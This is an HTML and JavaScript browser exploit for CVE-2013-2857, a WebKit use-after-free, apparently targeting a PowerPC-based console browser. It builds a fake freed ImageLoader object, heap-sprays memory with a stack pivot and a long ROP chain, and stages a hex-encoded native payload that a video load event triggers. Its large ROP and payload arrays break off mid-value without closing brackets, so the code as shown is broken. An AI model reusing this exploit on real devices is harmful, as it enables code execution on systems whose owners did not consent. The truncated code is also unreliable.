<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash
-->
<html>
<head>
<script>
function UaF(a){
var pivotAdress = 17489356;
//5.5.2
{
var pivotAdressAdress = 461373440; //r6
}
var codegenAddress = 0x01800000; // don't change this.
var sizeWebCoreImageLoader = 0x18; // don't change this.
var _16K = 0x4000;
var _4K = 0x1000;
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
a.type="radio";
//Allocate this new WebCore::ImageLoader over freed WebCore::
var ab = new ArrayBuffer(sizeWebCoreImageLoader);
var dv = new DataView(ab)
/*
0:000:x86> dt webkit!WebCore::ImageLoader
+0x000 __VFN_table : Ptr32
+0x004 m_client : Ptr32 WebCore::ImageLoaderClient
+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
+0x00c m_failedLoadURL : WTF::AtomicString
+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
+0x010 m_imageComplete : Pos 3, 1 Bit
+0x010 m_loadManually : Pos 4, 1 Bit
+0x010 m_elementIsProtected : Pos 5, 1 Bit
*/
//Register:r3 Adress:0x1AF35330-0x1AF35360
dv.setUint32(0x00, 0x00000000); //vtable
dv.setUint32(0x04, pivotAdressAdress); //m_client
dv.setUint32(0x08, pivotAdressAdress); //m_image
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
dv.setUint32(0x14, 0x00000000); //padding
var realROPChain = [0x010204c8, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0107dd70, 0x01043150, 0x00000000, 0x00000000, 0x00000002, 0x00000000, 0x01080274, 0x010429dc, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0107dd70, 0x010418e4, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x48000005, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000000, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7f84e378, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000004, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7fa3eb78, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000008, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7f66db78, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d00000c, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x38c60004, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000010, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x80a40000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000014, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x38840004, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000018, 0x1cfff000, 
0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7c053000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d00001c, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x4082fff4, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000020, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7f45d378, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000024, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x38c00002, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000028, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7ca53430, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d00002c, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x7ca903a6, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000030, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x80a40000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000034, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x00000000, 0x00000000, 0x00000000, 0x90a30000, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 0x010375e0, 0x00000000, 0x1d000038, 0x1cfff000, 0x00000000, 0x0107dd70, 0x00000000, 0x00000000, 0x00000000, 0x0101d8d4, 
0x00000000, 0x00000000, 0x00000000, 0x38840004, 0x00000000, 0x0101cc10, 0x00000000, 0x00000000, 0x0
var payload= [0x3c201ab5, 0x6021d138, 0x480010c1, 0x9421ffe0, 0x3d200102, 0x7c0802a6, 0x3ca00180, 0x6129b828, 0x93e1001c, 0x90010024, 0x7c9f2378, 0x38c10008, 0x38a513f8, 0x38800000, 0x7d2903a6, 0x4e800421, 0x2f9f0000, 0x3bffffff, 0x40be000c, 0x39610020, 0x480012f8, 0x81210008, 0x7d2903a6, 0x4e800421, 0x4bffffe0, 0x9421ffc8, 0x7c0802a6, 0x3ca00180, 0x38800000, 0xbfa1002c, 0x3fc00102, 0x63deb828, 0x9001003c, 0x7fc903a6, 0x38c1001c, 0x38a51406, 0x7c7f1b78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c10018, 0x38a5140d, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c10014, 0x38a5141f, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c10010, 0x38a5142e, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c1000c, 0x38a51440, 0x38800000, 0x7fe3fb78, 0x4e800421, 0x3ca00180, 0x38c10008, 0x38a51449, 0x38800000, 0x7fc903a6, 0x7fe3fb78, 0x4e800421, 0x81210008, 0x7d2903a6, 0x4e800421, 0x81210018, 0x7c7d1b78, 0x38800040, 0x7d2903a6, 0x38600100, 0x4e800421, 0x8121001c, 0x38a00100, 0x38800000, 0x7d2903a6, 0x7c7e1b78, 0x4e800421, 0x81210010, 0x38e00000, 0x38c00000, 0x38a00003, 0x7fc4f378, 0x7d2903a6, 0x7fa3eb78, 0x4e800421, 0x8121000c, 0x7fa3eb78, 0x7d2903a6, 0x4e800421, 0x81210014, 0x7fc3f378, 0x7d2903a6, 0x4e800421, 0x3c80000f, 0x6084fffc, 0x7fe3fb78, 0x4bfffe61, 0x39610038, 0x4800118c, 0x39450001, 0x39200000, 0x7d4903a6, 0x4200000c, 0x38600000, 0x4e800020, 0x7d4348ae, 0x7d0448ae, 0x7f8a4000, 0x409e000c, 0x39290001, 0x4bffffe0, 0x38600001, 0x4e800020, 0x39450001, 0x39200000, 0x7d4903a6, 0x42000008, 0x4e800020, 0x7d4448ae, 0x7d4349ae, 0x39290001, 0x4bffffec, 0x9421ffe8, 0x7c0802a6, 0x9001001c, 0xbf810008, 0x7c7e1b78, 0x7c9d2378, 0x7cbf2b78, 0x3f800180, 0x7f9fe000, 0x40be005c, 0x3f800f84, 0x3fe00d80, 0x639c8a0c, 0x7fa5eb78, 0x7fc4f378, 0x7fe3fb78, 0x4bffff65, 0x2f830000, 0x419e002c, 0x3bff0004, 0x7f9fe000, 0x409effe0, 0x3d200103, 0x3c600180, 0x61291618, 0x38631451, 0x7d2903a6, 0x3be00000, 0x4e800421, 0x39610018, 0x7fe3fb78, 0x480010ac, 
0x7fa5eb78, 0x7fc4f378, 0x7fe3fb78, 0x4bffff19, 0x2f830000, 0x41beffe0, 0x3bff0004, 0x4bffff84, 0x9421fff0, 0x7c0802a6, 0x93e1000c, 0x7c7f1b78, 0x90010014, 0x38600001, 0x38800000, 0x38a00000, 0x38c00000, 0x38e00000, 0x3d000001, 0x7fe9fb78, 0x38003400, 0x7c3f0b78, 0x44000002, 0x60000000, 0x7fe1fb78, 0x7c7f1b78, 0x39610010, 0x7fe3fb78, 0x48001044, 0x9421fff0, 0x7c0802a6, 0xbfc10008, 0x7c7f1b78, 0x90010014, 0x7c9e2378, 0x38600001, 0x38800000, 0x7fc5f378, 0x38c00000, 0x38e00000, 0x3d000001, 0x7fe9fb78, 0x7c3e0b78, 0x38003500, 0x44000002, 0x60000000, 0x7fc1f378, 0x39610010, 0x48000ff0, 0x9421fed0, 0x7c0802a6, 0x39200000, 0x90010134, 0x388100ec, 0x912100ec, 0x3d200102, 0x6129a3b4, 0xbea10104, 0x83e30004, 0x7c7a1b78, 0x3c600180, 0x7d2903a6, 0x38631463, 0x3fc00102, 0x63deb828, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100e8, 0x38a5146b, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100e4, 0x38a51475, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100e0, 0x38a5147b, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100dc, 0x38a51488, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100d8, 0x38a5149a, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100d4, 0x38a514a7, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100d0, 0x38a5140d, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100cc, 0x38a5141f, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100c8, 0x38a514bd, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100c4, 0x38a514cc, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100c0, 0x38a514db, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fe3fb78, 0x7fc903a6, 0x38c100bc, 0x38a514e8, 0x38800000, 0x4e800421, 0x3ca00180, 0x7fc903a6, 0x38c100b8, 0x7fe3fb78, 0x38a513f8, 0x38800000, 0x4e800421, 0x3d200180, 0x3be9135c, 0x8109135c, 0x815f0004, 0x3880000c, 0x813f0008, 0x38610088, 0x80a100e8, 0x91010088, 
0x9141008c, 0x91210090, 0x4bfffce1, 0x811f000c, 0x3880000c, 0x815f0010, 0x7c771b78, 0x813f0014, 0x3861007
//Spray large ArrayBuffer with pivotAdress, increase the spray for a bigger ROP exeuction chance (affects the position of the payload)
var ar = new Array(0x1800*2);
for(var i=0; i<0x1800*2; i++){
ar[i] = new DataView(new ArrayBuffer(_4K));
for(var j=0; j<_4K; j+=8){
ar[i].setFloat64(j, 0x10000000+j); //filler
}
ar[i].setUint32(0x204, 0x0);
ar[i].setUint32(0x018, pivotAdressAdress);
ar[i].setUint32(0x000, pivotAdressAdress+0x20);
ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;
//r11, new stack location
ar[i].setUint32(0x208, pivotAdressAdress+0x300);
//initialize this Rop Chain
var ropCurrentOffset = 0x304;
//start of the Rop Chain
realROPChain.forEach(function(element) {
ar[i].setUint32(ropCurrentOffset, element);
ropCurrentOffset += 4;
});
}
var payloadBuffer = new DataView(new ArrayBuffer(_16K));
payloadBuffer.setUint32(0, 3735924734); // Place search for value
var curOffset = 4;
for(var curI = 0; curI< payload.length;curI++){
payloadBuffer.setUint32(curOffset,payload[curI]);
curOffset += 4;
}
//Use the new WebCore::ImageLoader & pivot !
return 0;
}
// Blocks the calling thread for roughly `ms` milliseconds by spinning on the
// clock (no setTimeout, so nothing else on the page runs meanwhile), then
// switches the `x` element's type.
//   ms - delay in milliseconds.
// `x` is not declared in this script; presumably it resolves to the
// <input id="x"> in the body through the browser's named-element globals —
// verify against the markup. Changing its type is what the page appears to
// rely on to fire that input's onerror handler.
function sleep(ms) {
var unixtime_ms = new Date().getTime();
// Busy-wait: loop until the wall clock has advanced by `ms`.
while(new Date().getTime() < unixtime_ms + ms) {}
x.type='image';
}
</script>
</head>
<body>
<input id="x" type="hidden" onerror="UaF(this);" src=""/>
<video onloadstart="sleep(500)">
<source src="indexiine.mp4" type="video/mp4">
</video>
</body>
</html>